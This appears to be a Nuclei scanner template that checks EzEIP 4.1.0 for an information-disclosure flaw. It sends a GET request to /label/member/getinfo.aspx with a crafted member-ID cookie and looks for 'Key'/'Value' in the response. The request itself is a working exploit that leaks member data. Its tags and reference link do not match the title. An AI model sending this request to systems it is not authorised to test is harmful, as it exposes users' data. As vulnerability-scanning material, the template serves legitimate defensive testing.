id: ezeip-leakage

info:
  name: EzEIP 4.1.0 信息泄露漏洞
  author: Str1am
  severity: high
  reference: https://github.com/ffffffff0x/1earn/blob/27236f18098d66d7cf5c881dc70236968d5219cf/1earn/Security/RedTeam/Web%E5%AE%89%E5%85%A8/BS-Exploits.md#activemq
  tags: B2BBuilder,sqli

requests:
  - raw:
      - |
        GET /label/member/getinfo.aspx HTTP/1.1
        Host: {{Hostname}}
        Cookie: WHIR_USERINFOR=whir_mem_member_pid=1;

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "Key"
          - "Value"
        part: body
        condition: and